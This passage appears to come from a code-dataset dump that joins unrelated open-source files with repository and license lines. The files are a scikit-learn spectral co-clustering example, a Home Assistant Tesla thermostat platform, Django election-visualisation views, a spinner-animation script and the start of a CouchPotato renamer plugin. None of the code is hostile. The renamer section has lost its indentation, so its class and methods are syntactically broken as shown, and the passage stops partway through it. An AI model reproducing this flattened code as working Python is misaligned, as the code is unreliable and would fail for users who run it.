twenty newsgroups dataset. The 'comp.os.ms-windows.misc' category is
excluded because it contains many posts containing nothing but data.
The TF-IDF vectorized posts form a word frequency matrix, which is
then biclustered using Dhillon's Spectral Co-Clustering algorithm. The
resulting document-word biclusters indicate subsets of words used more
often in those subsets of documents.
For a few of the best biclusters, their most common document categories
and their ten most important words get printed. The best biclusters are
determined by their normalized cut. The best words are determined by
comparing their sums inside and outside the bicluster.
For comparison, the documents are also clustered using
MiniBatchKMeans. The document clusters derived from the biclusters
achieve a better V-measure than clusters found by MiniBatchKMeans.
Output::
Vectorizing...
Coclustering...
Done in 9.53s. V-measure: 0.4455
MiniBatchKMeans...
Done in 12.00s. V-measure: 0.3309
Best biclusters:
----------------
bicluster 0 : 1951 documents, 4373 words
categories : 23% talk.politics.guns, 19% talk.politics.misc, 14% sci.med
words : gun, guns, geb, banks, firearms, drugs, gordon, clinton, cdt, amendment
bicluster 1 : 1165 documents, 3304 words
categories : 29% talk.politics.mideast, 26% soc.religion.christian, 25% alt.atheism
words : god, jesus, christians, atheists, kent, sin, morality, belief, resurrection, marriage
bicluster 2 : 2219 documents, 2830 words
categories : 18% comp.sys.mac.hardware, 16% comp.sys.ibm.pc.hardware, 16% comp.graphics
words : voltage, dsp, board, receiver, circuit, shipping, packages, stereo, compression, package
bicluster 3 : 1860 documents, 2745 words
categories : 26% rec.motorcycles, 23% rec.autos, 13% misc.forsale
words : bike, car, dod, engine, motorcycle, ride, honda, cars, bmw, bikes
bicluster 4 : 12 documents, 155 words
categories : 100% rec.sport.hockey
words : scorer, unassisted, reichel, semak, sweeney, kovalenko, ricci, audette, momesso, nedved
"""
from __future__ import print_function
print(__doc__)
from collections import defaultdict
import operator
import re
from time import time
import numpy as np
from sklearn.cluster.bicluster import SpectralCoclustering
from sklearn.cluster import MiniBatchKMeans
from sklearn.externals.six import iteritems
from sklearn.datasets.twenty_newsgroups import fetch_20newsgroups
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.cluster import v_measure_score
def number_aware_tokenizer(doc):
    """ Tokenizer that maps all numeric tokens to a placeholder.

    For many applications, tokens that begin with a number are not directly
    useful, but the fact that such a token exists can be relevant. By applying
    this form of dimensionality reduction, some methods may perform better.
    """
    # Tokens are runs of two or more word characters.
    token_pattern = re.compile(u'(?u)\\b\\w\\w+\\b')
    out = []
    for token in token_pattern.findall(doc):
        if token[0] in "0123456789_":
            out.append("#NUMBER")
        else:
            out.append(token)
    return out
# exclude 'comp.os.ms-windows.misc'
categories = ['alt.atheism', 'comp.graphics',
              'comp.sys.ibm.pc.hardware', 'comp.sys.mac.hardware',
              'comp.windows.x', 'misc.forsale', 'rec.autos',
              'rec.motorcycles', 'rec.sport.baseball',
              'rec.sport.hockey', 'sci.crypt', 'sci.electronics',
              'sci.med', 'sci.space', 'soc.religion.christian',
              'talk.politics.guns', 'talk.politics.mideast',
              'talk.politics.misc', 'talk.religion.misc']
newsgroups = fetch_20newsgroups(categories=categories)
y_true = newsgroups.target

# One cluster per newsgroup category for both algorithms.
vectorizer = TfidfVectorizer(stop_words='english', min_df=5,
                             tokenizer=number_aware_tokenizer)
cocluster = SpectralCoclustering(n_clusters=len(categories),
                                 svd_method='arpack', random_state=0)
kmeans = MiniBatchKMeans(n_clusters=len(categories), batch_size=20000,
                         random_state=0)

print("Vectorizing...")
X = vectorizer.fit_transform(newsgroups.data)

# Co-cluster the TF-IDF matrix and score its row (document) labels
# against the true newsgroup labels.
print("Coclustering...")
start_time = time()
cocluster.fit(X)
y_cocluster = cocluster.row_labels_
print("Done in {:.2f}s. V-measure: {:.4f}".format(
    time() - start_time,
    v_measure_score(y_cocluster, y_true)))

# Baseline: flat MiniBatchKMeans clustering of the same matrix.
print("MiniBatchKMeans...")
start_time = time()
y_kmeans = kmeans.fit_predict(X)
print("Done in {:.2f}s. V-measure: {:.4f}".format(
    time() - start_time,
    v_measure_score(y_kmeans, y_true)))

feature_names = vectorizer.get_feature_names()
document_names = list(newsgroups.target_names[i] for i in newsgroups.target)
def bicluster_ncut(i):
    """Return the normalized-cut value of bicluster *i* (lower is better).

    Empty biclusters get the largest representable float so that they sort
    last when ranking by ncut.
    """
    import sys

    rows, cols = cocluster.get_indices(i)
    # `rows`/`cols` are index arrays, so emptiness must be tested by length.
    # (The previous np.any() test wrongly treated a cluster whose only member
    # was index 0 as empty, since np.any([0]) is False.)
    if len(rows) == 0 or len(cols) == 0:
        return sys.float_info.max
    row_complement = np.nonzero(np.logical_not(cocluster.rows_[i]))[0]
    col_complement = np.nonzero(np.logical_not(cocluster.columns_[i]))[0]
    # Note: the following is identical to X[rows[:, np.newaxis], cols].sum() but
    # much faster in scipy <= 0.16
    weight = X[rows][:, cols].sum()
    cut = (X[row_complement][:, cols].sum() +
           X[rows][:, col_complement].sum())
    return cut / weight
def most_common(d):
    """Items of a defaultdict(int) with the highest values.

    Like Counter.most_common in Python >=2.7.
    """
    # dict.items() works on both Python 2 and 3, so the six.iteritems
    # compatibility shim is unnecessary here.
    return sorted(d.items(), key=operator.itemgetter(1), reverse=True)
# Rank all biclusters by normalized cut; the five smallest are "best".
bicluster_ncuts = list(bicluster_ncut(i)
                       for i in range(len(newsgroups.target_names)))
best_idx = np.argsort(bicluster_ncuts)[:5]

print()
print("Best biclusters:")
print("----------------")
for idx, cluster in enumerate(best_idx):
    n_rows, n_cols = cocluster.get_shape(cluster)
    cluster_docs, cluster_words = cocluster.get_indices(cluster)
    if not len(cluster_docs) or not len(cluster_words):
        continue

    # categories: share of the cluster's documents per newsgroup (top 3).
    counter = defaultdict(int)
    for i in cluster_docs:
        counter[document_names[i]] += 1
    cat_string = ", ".join("{:.0f}% {}".format(float(c) / n_rows * 100, name)
                           for name, c in most_common(counter)[:3])

    # words: score each word by (sum inside cluster) - (sum outside cluster).
    out_of_cluster_docs = cocluster.row_labels_ != cluster
    out_of_cluster_docs = np.where(out_of_cluster_docs)[0]
    word_col = X[:, cluster_words]
    word_scores = np.array(word_col[cluster_docs, :].sum(axis=0) -
                           word_col[out_of_cluster_docs, :].sum(axis=0))
    word_scores = word_scores.ravel()
    # Ten highest-scoring words, best first.
    important_words = list(feature_names[cluster_words[i]]
                           for i in word_scores.argsort()[:-11:-1])

    print("bicluster {} : {} documents, {} words".format(
        idx, n_rows, n_cols))
    print("categories : {}".format(cat_string))
    print("words : {}\n".format(', '.join(important_words)))
| bsd-3-clause |
nugget/home-assistant | homeassistant/components/tesla/climate.py | 2 | 3315 | """Support for Tesla HVAC system."""
import logging
from homeassistant.components.climate import ClimateDevice, ENTITY_ID_FORMAT
from homeassistant.components.climate.const import (
SUPPORT_OPERATION_MODE, SUPPORT_TARGET_TEMPERATURE)
from homeassistant.components.tesla import DOMAIN as TESLA_DOMAIN
from homeassistant.components.tesla import TeslaDevice
from homeassistant.const import (
ATTR_TEMPERATURE, STATE_OFF, STATE_ON, TEMP_CELSIUS, TEMP_FAHRENHEIT)
_LOGGER = logging.getLogger(__name__)

DEPENDENCIES = ['tesla']

# Order matters: index 0 is the "on" mode, index 1 the "off" mode
# (current_operation and set_operation_mode index into this list).
OPERATION_LIST = [STATE_ON, STATE_OFF]

SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_OPERATION_MODE
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Set up the Tesla climate platform."""
    # One thermostat entity per climate device discovered by the Tesla
    # component; they all share the component's controller instance.
    devices = [TeslaThermostat(device, hass.data[TESLA_DOMAIN]['controller'])
               for device in hass.data[TESLA_DOMAIN]['devices']['climate']]
    add_entities(devices, True)
class TeslaThermostat(TeslaDevice, ClimateDevice):
    """Climate (HVAC) entity backed by a Tesla vehicle."""

    def __init__(self, tesla_device, controller):
        """Create the entity and seed its cached temperature readings."""
        super().__init__(tesla_device, controller)
        self.entity_id = ENTITY_ID_FORMAT.format(self.tesla_id)
        self._target_temperature = None
        self._temperature = None

    @property
    def supported_features(self):
        """Flags describing what this entity supports."""
        return SUPPORT_FLAGS

    @property
    def current_operation(self):
        """Current operation mode: 'on' while HVAC runs, otherwise 'off'."""
        if self.tesla_device.is_hvac_enabled():
            return OPERATION_LIST[0]  # on
        return OPERATION_LIST[1]  # off

    @property
    def operation_list(self):
        """All selectable operation modes."""
        return OPERATION_LIST

    def update(self):
        """Refresh the cached temperatures from the Tesla device."""
        _LOGGER.debug("Updating: %s", self._name)
        self.tesla_device.update()
        self._target_temperature = self.tesla_device.get_goal_temp()
        self._temperature = self.tesla_device.get_current_temp()

    @property
    def temperature_unit(self):
        """Unit reported by the car: 'F' maps to Fahrenheit, anything else to Celsius."""
        if self.tesla_device.measurement == 'F':
            return TEMP_FAHRENHEIT
        return TEMP_CELSIUS

    @property
    def current_temperature(self):
        """Last known cabin temperature."""
        return self._temperature

    @property
    def target_temperature(self):
        """Temperature the HVAC is trying to reach."""
        return self._target_temperature

    def set_temperature(self, **kwargs):
        """Push a new target temperature to the car, if one was provided."""
        _LOGGER.debug("Setting temperature for: %s", self._name)
        new_target = kwargs.get(ATTR_TEMPERATURE)
        if new_target:
            self.tesla_device.set_temperature(new_target)

    def set_operation_mode(self, operation_mode):
        """Turn the HVAC on or off according to *operation_mode*."""
        _LOGGER.debug("Setting mode for: %s", self._name)
        if operation_mode == OPERATION_LIST[0]:  # on
            self.tesla_device.set_status(True)
        elif operation_mode == OPERATION_LIST[1]:  # off
            self.tesla_device.set_status(False)
| apache-2.0 |
frocentus/offenewahlen-nrw17 | src/viz/views.py | 1 | 3312 | import json
import csv
import os
from django.conf import settings
from django.core import serializers
from django.core.cache import cache
from django.http import HttpResponse, JsonResponse, FileResponse
from django.shortcuts import render
from django.template import loader
from django.template.context_processors import csrf
from django.views.decorators.cache import cache_page
from viz.models import PollingStationResult, ListResult, PollingStation, Election, Municipality, RegionalElectoralDistrict, District, State, Party, RawData, List
from wsgiref.util import FileWrapper
def export_csv(filename, data):
    """Write the NRW13 per-municipality results in *data* to *filename* as CSV.

    *data* maps arbitrary keys to dicts carrying one row of result fields;
    rows are written in iteration order with a 1-based running ``id`` column.
    """
    header = ['id', 'gemeinde_name', 'gemeinde_kennzahl', 'gemeinde_code',
              'eligible_voters', 'votes', 'valid', 'invalid', 'ts',
              'spoe_nrw13', 'oevp_nrw13', 'fpoe_nrw13', 'gruene_nrw13',
              'bzoe_nrw13', 'neos_nrw13', 'stronach_nrw13', 'wandel_nrw13',
              'pirat_nrw13', 'kpoe_nrw13', 'slp_nrw13', 'euaus_nrw13',
              'cpoe_nrw13']
    # newline='' is required by the csv module; without it the writer emits
    # blank lines between rows on Windows.
    with open(filename, 'w', newline='') as csvfile:
        csvwriter = csv.writer(csvfile, delimiter=',', quotechar='"')
        csvwriter.writerow(header)
        # Derive each row from the header order instead of spelling out the
        # 22 fields a second time (keeps header and rows in sync).
        for counter, value in enumerate(data.values(), start=1):
            row = [str(counter)] + [str(value[field]) for field in header[1:]]
            csvwriter.writerow(row)
def load_test(request):
    """Serve the loader.io verification token so the load-testing service
    can confirm ownership of this deployment."""
    filename = 'data/deployment/loaderio-eac9628bcae9be5601e1f3c62594d162.txt'
    wrapper = FileWrapper(open(filename))
    # NOTE(review): the file handle is handed to FileWrapper and never
    # explicitly closed; presumably the response consumes it -- confirm.
    response = HttpResponse(wrapper, content_type = 'text/txt')
    response['Content-Length'] = os.path.getsize(filename)
    response['Content-Disposition'] = 'attachment; filename="loaderio-eac9628bcae9be5601e1f3c62594d162.txt"'
    return response
def index(request):
    """Render the viz/index_viz.dtl template (visualization landing page)."""
    return render(request, 'viz/index_viz.dtl')


def viz_overview(request):
    """Render the viz/index_viz_overview.dtl template."""
    return render(request, 'viz/index_viz_overview.dtl')


def viz_results_map(request):
    """Render the viz/index_viz_result_map.dtl template."""
    return render(request, 'viz/index_viz_result_map.dtl')


def viz_results_mapnrw13(request):
    """Render the viz/index_viz_result_mapnrw13.dtl template."""
    return render(request, 'viz/index_viz_result_mapnrw13.dtl')


def viz_results_mapcanvas(request):
    """Render the viz/index_viz_result_mapcanvas.dtl template."""
    return render(request, 'viz/index_viz_result_mapcanvas.dtl')


def viz_results_bar(request):
    """Render the viz/index_viz_result_bar.dtl template."""
    return render(request, 'viz/index_viz_result_bar.dtl')


def viz_results_timeseries(request):
    """Render the viz/index_viz_result_timeseries.dtl template."""
    return render(request, 'viz/index_viz_result_timeseries.dtl')
def serve_nrw13_csv(request):
    """Serve the nrw13.csv export as a file download."""
    # Create the HttpResponse object with the appropriate CSV header.
    filename = 'data/export/nrw13.csv'
    wrapper = FileWrapper(open(filename))
    # NOTE(review): the file handle is handed to FileWrapper and never
    # explicitly closed; presumably the response consumes it -- confirm.
    response = HttpResponse(wrapper, content_type = 'text/csv')
    response['Content-Length'] = os.path.getsize(filename)
    response['Content-Disposition'] = 'attachment; filename="nrw13.csv"'
    return response
def waiting(request):
    """Render the viz/index_waiting.dtl template."""
    return render(request, 'viz/index_waiting.dtl')


def computing(request):
    """Render the viz/index_computing.dtl template."""
    return render(request, 'viz/index_computing.dtl')


def test(request):
    """Render the viz/index_test.dtl template."""
    return render(request, 'viz/index_test.dtl')
| mit |
Jutarul/ppcoin-tournament | src/share/qt/make_spinner.py | 4415 | 1035 | #!/usr/bin/env python
# W.J. van der Laan, 2011
# Make spinning .mng animation from a .png
# Requires imagemagick 6.7+
from __future__ import division
from os import path
from PIL import Image
from subprocess import Popen
# Configuration
SRC = 'img/reload_scaled.png'                       # input still image
DST = '../../src/qt/res/movies/update_spinner.mng'  # output animation
TMPDIR = '/tmp'                                     # where intermediate frames go
TMPNAME = 'tmp-%03i.png'                            # frame filename pattern
NUMFRAMES = 35                                      # frames in one full rotation
FRAMERATE = 10.0                                    # value for imagemagick's -delay option
CONVERT = 'convert'                                 # imagemagick binary
CLOCKWISE = True                                    # spin direction
DSIZE = (16, 16)                                    # output frame size in pixels

im_src = Image.open(SRC)

# Mirror the source image when spinning clockwise (the rotation angle is
# also negated below).
if CLOCKWISE:
    im_src = im_src.transpose(Image.FLIP_LEFT_RIGHT)

def frame_to_filename(frame):
    """Return the temp-file path for frame number *frame*."""
    return path.join(TMPDIR, TMPNAME % frame)

# Render each rotated, downscaled frame to its own temporary PNG.
frame_files = []
for frame in xrange(NUMFRAMES):
    # Sample the rotation at the middle of each frame interval (hence +0.5).
    rotation = (frame + 0.5) / NUMFRAMES * 360.0
    if CLOCKWISE:
        rotation = -rotation
    im_new = im_src.rotate(rotation, Image.BICUBIC)
    im_new.thumbnail(DSIZE, Image.ANTIALIAS)
    outfile = frame_to_filename(frame)
    im_new.save(outfile, 'png')
    frame_files.append(outfile)

# Assemble all frames into a single .mng animation with imagemagick.
p = Popen([CONVERT, "-delay", str(FRAMERATE), "-dispose", "2"] + frame_files + [DST])
p.communicate()
| mit |
jymannob/CouchPotatoServer | couchpotato/core/plugins/renamer.py | 4 | 69077 | import fnmatch
import os
import re
import shutil
import time
import traceback
from couchpotato import get_db
from couchpotato.api import addApiView
from couchpotato.core.event import addEvent, fireEvent, fireEventAsync
from couchpotato.core.helpers.encoding import toUnicode, ss, sp
from couchpotato.core.helpers.variable import getExt, mergeDicts, getTitle, \
getImdb, link, symlink, tryInt, splitString, fnEscape, isSubFolder, getIdentifier
from couchpotato.core.logger import CPLog
from couchpotato.core.plugins.base import Plugin
from couchpotato.environment import Env
from unrar2 import RarFile
import six
from six.moves import filter
log = CPLog(__name__)

# Name of the plugin class CouchPotato should auto-load from this module.
autoload = 'Renamer'
class Renamer(Plugin):
renaming_started = False
checking_snatched = False
def __init__(self):
    # Register the renamer.scan API endpoint together with its docs.
    addApiView('renamer.scan', self.scanView, docs = {
        'desc': 'For the renamer to check for new files to rename in a folder',
        'params': {
            'async': {'desc': 'Optional: Set to 1 if you dont want to fire the renamer.scan asynchronous.'},
            'media_folder': {'desc': 'Optional: The folder of the media to scan. Keep empty for default renamer folder.'},
            'files': {'desc': 'Optional: Provide the release files if more releases are in the same media_folder, delimited with a \'|\'. Note that no dedicated release folder is expected for releases with one file.'},
            'base_folder': {'desc': 'Optional: The folder to find releases in. Leave empty for default folder.'},
            'downloader': {'desc': 'Optional: The downloader the release has been downloaded with. \'download_id\' is required with this option.'},
            'download_id': {'desc': 'Optional: The nzb/torrent ID of the release in media_folder. \'downloader\' is required with this option.'},
            'status': {'desc': 'Optional: The status of the release: \'completed\' (default) or \'seeding\''},
        },
    })

    # Wire internal events; also scan and install the cron schedules at
    # application start.
    addEvent('renamer.scan', self.scan)
    addEvent('renamer.check_snatched', self.checkSnatched)
    addEvent('app.load', self.scan)
    addEvent('app.load', self.setCrons)

    # Enable / disable interval: re-install schedules whenever the relevant
    # settings are saved.
    addEvent('setting.save.renamer.enabled.after', self.setCrons)
    addEvent('setting.save.renamer.run_every.after', self.setCrons)
    addEvent('setting.save.renamer.force_every.after', self.setCrons)
def setCrons(self):
    """(Re)install the renamer's interval schedules from the current settings."""
    # Snatched-download check interval (minutes); removed first so a changed
    # setting replaces the old schedule instead of stacking a second one.
    fireEvent('schedule.remove', 'renamer.check_snatched')
    if self.isEnabled() and self.conf('run_every') > 0:
        fireEvent('schedule.interval', 'renamer.check_snatched', self.checkSnatched, minutes = self.conf('run_every'), single = True)

    # Forced full-scan interval (hours).
    fireEvent('schedule.remove', 'renamer.check_snatched_forced')
    if self.isEnabled() and self.conf('force_every') > 0:
        fireEvent('schedule.interval', 'renamer.check_snatched_forced', self.scan, hours = self.conf('force_every'), single = True)

    return True
def scanView(self, **kwargs):
    """API handler for renamer.scan: kick off a scan, optionally asynchronously.

    Accepted kwargs are documented with the addApiView registration:
    async, base_folder, media_folder (or legacy movie_folder), files,
    downloader, download_id and status.
    """
    # 'async' became a reserved keyword in Python 3.7, so it may only be
    # used as a dict key here, never as a variable name.
    scan_async = tryInt(kwargs.get('async', 0))
    base_folder = kwargs.get('base_folder')
    media_folder = sp(kwargs.get('media_folder'))

    # Backwards compatibility, to be removed after a few versions :)
    if not media_folder:
        media_folder = sp(kwargs.get('movie_folder'))

    downloader = kwargs.get('downloader')
    download_id = kwargs.get('download_id')
    files = [sp(filename) for filename in splitString(kwargs.get('files'), '|')]
    status = kwargs.get('status', 'completed')

    # Build the release_download descriptor only when a specific media
    # folder was given (otherwise the default base folder is scanned).
    release_download = None
    if not base_folder and media_folder:
        release_download = {'folder': media_folder}

        if download_id:
            release_download.update({
                'id': download_id,
                'downloader': downloader,
                'status': status,
                'files': files
            })

    fire_handle = fireEvent if not scan_async else fireEventAsync
    fire_handle('renamer.scan', base_folder = base_folder, release_download = release_download)

    return {
        'success': True
    }
def scan(self, base_folder = None, release_download = None):
if not release_download: release_download = {}
if self.isDisabled():
return
if self.renaming_started is True:
log.info('Renamer is already running, if you see this often, check the logs above for errors.')
return
if not base_folder:
base_folder = sp(self.conf('from'))
from_folder = sp(self.conf('from'))
to_folder = sp(self.conf('to'))
# Get media folder to process
media_folder = sp(release_download.get('folder'))
# Get all folders that should not be processed
no_process = [to_folder]
cat_list = fireEvent('category.all', single = True) or []
no_process.extend([item['destination'] for item in cat_list])
try:
if Env.setting('library', section = 'manage').strip():
no_process.extend([sp(manage_folder) for manage_folder in splitString(Env.setting('library', section = 'manage'), '::')])
except:
pass
# Check to see if the no_process folders are inside the "from" folder.
if not os.path.isdir(base_folder) or not os.path.isdir(to_folder):
log.error('Both the "To" and "From" folder have to exist.')
return
else:
for item in no_process:
if isSubFolder(item, base_folder):
log.error('To protect your data, the media libraries can\'t be inside of or the same as the "from" folder. "%s" in "%s"', (item, base_folder))
return
# Check to see if the no_process folders are inside the provided media_folder
if media_folder and not os.path.isdir(media_folder):
log.debug('The provided media folder %s does not exist. Trying to find it in the \'from\' folder.', media_folder)
# Update to the from folder
if len(release_download.get('files', [])) == 1:
new_media_folder = sp(from_folder)
else:
new_media_folder = sp(os.path.join(from_folder, os.path.basename(media_folder)))
if not os.path.isdir(new_media_folder):
log.error('The provided media folder %s does not exist and could also not be found in the \'from\' folder.', media_folder)
return
# Update the files
new_files = [os.path.join(new_media_folder, os.path.relpath(filename, media_folder)) for filename in release_download.get('files', [])]
if new_files and not os.path.isfile(new_files[0]):
log.error('The provided media folder %s does not exist and its files could also not be found in the \'from\' folder.', media_folder)
return
# Update release_download info to the from folder
log.debug('Release %s found in the \'from\' folder.', media_folder)
release_download['folder'] = new_media_folder
release_download['files'] = new_files
media_folder = new_media_folder
if media_folder:
for item in no_process:
if isSubFolder(item, media_folder):
log.error('To protect your data, the media libraries can\'t be inside of or the same as the provided media folder. "%s" in "%s"', (item, media_folder))
return
# Make sure a checkSnatched marked all downloads/seeds as such
if not release_download and self.conf('run_every') > 0:
self.checkSnatched(fire_scan = False)
self.renaming_started = True
# make sure the media folder name is included in the search
folder = None
files = []
if media_folder:
log.info('Scanning media folder %s...', media_folder)
folder = os.path.dirname(media_folder)
release_files = release_download.get('files', [])
if release_files:
files = release_files
# If there is only one file in the torrent, the downloader did not create a subfolder
if len(release_files) == 1:
folder = media_folder
else:
# Get all files from the specified folder
try:
for root, folders, names in os.walk(media_folder):
files.extend([sp(os.path.join(root, name)) for name in names])
except:
log.error('Failed getting files from %s: %s', (media_folder, traceback.format_exc()))
db = get_db()
# Extend the download info with info stored in the downloaded release
keep_original = self.moveTypeIsLinked()
is_torrent = False
if release_download:
release_download = self.extendReleaseDownload(release_download)
is_torrent = self.downloadIsTorrent(release_download)
keep_original = True if is_torrent and self.conf('file_action') not in ['move'] else keep_original
# Unpack any archives
extr_files = None
if self.conf('unrar'):
folder, media_folder, files, extr_files = self.extractFiles(folder = folder, media_folder = media_folder, files = files,
cleanup = self.conf('cleanup') and not keep_original)
groups = fireEvent('scanner.scan', folder = folder if folder else base_folder,
files = files, release_download = release_download, return_ignored = False, single = True) or []
folder_name = self.conf('folder_name')
file_name = self.conf('file_name')
trailer_name = self.conf('trailer_name')
nfo_name = self.conf('nfo_name')
separator = self.conf('separator')
# Tag release folder as failed_rename in case no groups were found. This prevents check_snatched from removing the release from the downloader.
if not groups and self.statusInfoComplete(release_download):
self.tagRelease(release_download = release_download, tag = 'failed_rename')
for group_identifier in groups:
group = groups[group_identifier]
group['release_download'] = None
rename_files = {}
remove_files = []
remove_releases = []
media_title = getTitle(group)
# Add _UNKNOWN_ if no library item is connected
if not group.get('media') or not media_title:
self.tagRelease(group = group, tag = 'unknown')
continue
# Rename the files using the library data
else:
# Media not in library, add it first
if not group['media'].get('_id'):
group['media'] = fireEvent('movie.add', params = {
'identifier': group['identifier'],
'profile_id': None
}, search_after = False, status = 'done', single = True)
else:
group['media'] = fireEvent('movie.update_info', media_id = group['media'].get('_id'), single = True)
if not group['media'] or not group['media'].get('_id'):
log.error('Could not rename, no library item to work with: %s', group_identifier)
continue
media = group['media']
media_title = getTitle(media)
# Overwrite destination when set in category
destination = to_folder
category_label = ''
if media.get('category_id') and media.get('category_id') != '-1':
try:
category = db.get('id', media['category_id'])
category_label = category['label']
if category['destination'] and len(category['destination']) > 0 and category['destination'] != 'None':
destination = category['destination']
log.debug('Setting category destination for "%s": %s' % (media_title, destination))
else:
log.debug('No category destination found for "%s"' % media_title)
except:
log.error('Failed getting category label: %s', traceback.format_exc())
# Overwrite destination when set in 3D
destination = to_folder
test3D = group['meta_data']['quality'].get('is_3d', 0)
if test3D :
if self.conf('to if 3d') and len(self.conf('to if 3d')) > 0 and self.conf('to if 3d') != 'None':
destination = self.conf('to if 3d')
log.debug('Setting 3D destination for "%s": %s' % (media_title, destination))
else:
log.debug('No 3D folder set')
if self.conf('folder_name_3d') and len(self.conf('folder_name_3d')) > 0 and self.conf('folder_name_3d') != 'None':
folder_name = self.conf('folder_name_3d')
log.debug('Setting 3D folder pattern for "%s": %s' % (media_title, folder_name))
else:
log.debug('No 3D folder pattern set')
if self.conf('file_name_3d') and len(self.conf('file_name_3d')) > 0 and self.conf('file_name_3d') != 'None':
file_name = self.conf('file_name_3d')
log.debug('Setting 3D file pattern for "%s": %s' % (media_title, file_name))
else:
log.debug('No 3D file pattern set')
# Find subtitle for renaming
group['before_rename'] = []
fireEvent('renamer.before', group)
# Add extracted files to the before_rename list
if extr_files:
group['before_rename'].extend(extr_files)
# Remove weird chars from movie name
movie_name = re.sub(r"[\x00\/\\:\*\?\"<>\|]", '', media_title)
# Put 'The' at the end
name_the = movie_name
for prefix in ['the ', 'an ', 'a ']:
if prefix == movie_name[:len(prefix)].lower():
name_the = movie_name[len(prefix):] + ', ' + prefix.strip().capitalize()
break
replacements = {
'ext': 'mkv',
'namethe': name_the.strip(),
'thename': movie_name.strip(),
'year': media['info']['year'],
'first': name_the[0].upper(),
'quality': group['meta_data']['quality']['label'],
'quality_type': group['meta_data']['quality_type'],
'video': group['meta_data'].get('video'),
'audio': group['meta_data'].get('audio'),
'group': group['meta_data']['group'],
'source': group['meta_data']['source'],
'resolution_width': group['meta_data'].get('resolution_width'),
'resolution_height': group['meta_data'].get('resolution_height'),
'audio_channels': group['meta_data'].get('audio_channels'),
'imdb_id': group['identifier'],
'cd': '',
'cd_nr': '',
'mpaa': media['info'].get('mpaa', ''),
'mpaa_only': media['info'].get('mpaa', ''),
'category': category_label,
'3d': '3D' if group['meta_data']['quality'].get('is_3d', 0) else '',
'3d_type': group['meta_data'].get('3d_type'),
}
if replacements['mpaa_only'] not in ('G', 'PG', 'PG-13', 'R', 'NC-17'):
replacements['mpaa_only'] = 'Not Rated'
for file_type in group['files']:
# Move nfo depending on settings
if file_type is 'nfo' and not self.conf('rename_nfo'):
log.debug('Skipping, renaming of %s disabled', file_type)
for current_file in group['files'][file_type]:
if self.conf('cleanup') and (not keep_original or self.fileIsAdded(current_file, group)):
remove_files.append(current_file)
continue
# Subtitle extra
if file_type is 'subtitle_extra':
continue
# Move other files
multiple = len(group['files'][file_type]) > 1 and not group['is_dvd']
cd = 1 if multiple else 0
for current_file in sorted(list(group['files'][file_type])):
current_file = sp(current_file)
# Original filename
replacements['original'] = os.path.splitext(os.path.basename(current_file))[0]
replacements['original_folder'] = fireEvent('scanner.remove_cptag', group['dirname'], single = True)
# Extension
replacements['ext'] = getExt(current_file)
# cd #
replacements['cd'] = ' cd%d' % cd if multiple else ''
replacements['cd_nr'] = cd if multiple else ''
# Naming
final_folder_name = self.doReplace(folder_name, replacements, folder = True)
final_file_name = self.doReplace(file_name, replacements)
replacements['filename'] = final_file_name[:-(len(getExt(final_file_name)) + 1)]
# Meta naming
if file_type is 'trailer':
final_file_name = self.doReplace(trailer_name, replacements, remove_multiple = True)
elif file_type is 'nfo':
final_file_name = self.doReplace(nfo_name, replacements, remove_multiple = True)
# Seperator replace
if separator:
final_file_name = final_file_name.replace(' ', separator)
# Move DVD files (no structure renaming)
if group['is_dvd'] and file_type is 'movie':
found = False
for top_dir in ['video_ts', 'audio_ts', 'bdmv', 'certificate']:
has_string = current_file.lower().find(os.path.sep + top_dir + os.path.sep)
if has_string >= 0:
structure_dir = current_file[has_string:].lstrip(os.path.sep)
rename_files[current_file] = os.path.join(destination, final_folder_name, structure_dir)
found = True
break
if not found:
log.error('Could not determine dvd structure for: %s', current_file)
# Do rename others
else:
if file_type is 'leftover':
if self.conf('move_leftover'):
rename_files[current_file] = os.path.join(destination, final_folder_name, os.path.basename(current_file))
elif file_type not in ['subtitle']:
rename_files[current_file] = os.path.join(destination, final_folder_name, final_file_name)
# Check for extra subtitle files
if file_type is 'subtitle':
remove_multiple = False
if len(group['files']['movie']) == 1:
remove_multiple = True
sub_langs = group['subtitle_language'].get(current_file, [])
# rename subtitles with or without language
sub_name = self.doReplace(file_name, replacements, remove_multiple = remove_multiple)
rename_files[current_file] = os.path.join(destination, final_folder_name, sub_name)
rename_extras = self.getRenameExtras(
extra_type = 'subtitle_extra',
replacements = replacements,
folder_name = folder_name,
file_name = file_name,
destination = destination,
group = group,
current_file = current_file,
remove_multiple = remove_multiple,
)
# Don't add language if multiple languages in 1 subtitle file
if len(sub_langs) == 1:
sub_suffix = '%s.%s' % (sub_langs[0], replacements['ext'])
# Don't add language to subtitle file it it's already there
if not sub_name.endswith(sub_suffix):
sub_name = sub_name.replace(replacements['ext'], sub_suffix)
rename_files[current_file] = os.path.join(destination, final_folder_name, sub_name)
rename_files = mergeDicts(rename_files, rename_extras)
# Filename without cd etc
elif file_type is 'movie':
rename_extras = self.getRenameExtras(
extra_type = 'movie_extra',
replacements = replacements,
folder_name = folder_name,
file_name = file_name,
destination = destination,
group = group,
current_file = current_file
)
rename_files = mergeDicts(rename_files, rename_extras)
group['filename'] = self.doReplace(file_name, replacements, remove_multiple = True)[:-(len(getExt(final_file_name)) + 1)]
group['destination_dir'] = os.path.join(destination, final_folder_name)
if multiple:
cd += 1
# Before renaming, remove the lower quality files
remove_leftovers = True
# Get media quality profile
profile = None
if media.get('profile_id'):
try:
profile = db.get('id', media['profile_id'])
except:
# Set profile to None as it does not exist anymore
mdia = db.get('id', media['_id'])
mdia['profile_id'] = None
db.update(mdia)
log.error('Error getting quality profile for %s: %s', (media_title, traceback.format_exc()))
else:
log.debug('Media has no quality profile: %s', media_title)
# Mark media for dashboard
mark_as_recent = False
# Go over current movie releases
for release in fireEvent('release.for_media', media['_id'], single = True):
# When a release already exists
if release.get('status') == 'done':
# This is where CP removes older, lesser quality releases or releases that are not wanted anymore
is_higher = fireEvent('quality.ishigher', \
group['meta_data']['quality'], {'identifier': release['quality'], 'is_3d': release.get('is_3d', False)}, profile, single = True)
if is_higher == 'higher':
log.info('Removing lesser or not wanted quality %s for %s.', (media_title, release.get('quality')))
for file_type in release.get('files', {}):
for release_file in release['files'][file_type]:
remove_files.append(release_file)
remove_releases.append(release)
# Same quality, but still downloaded, so maybe repack/proper/unrated/directors cut etc
elif is_higher == 'equal':
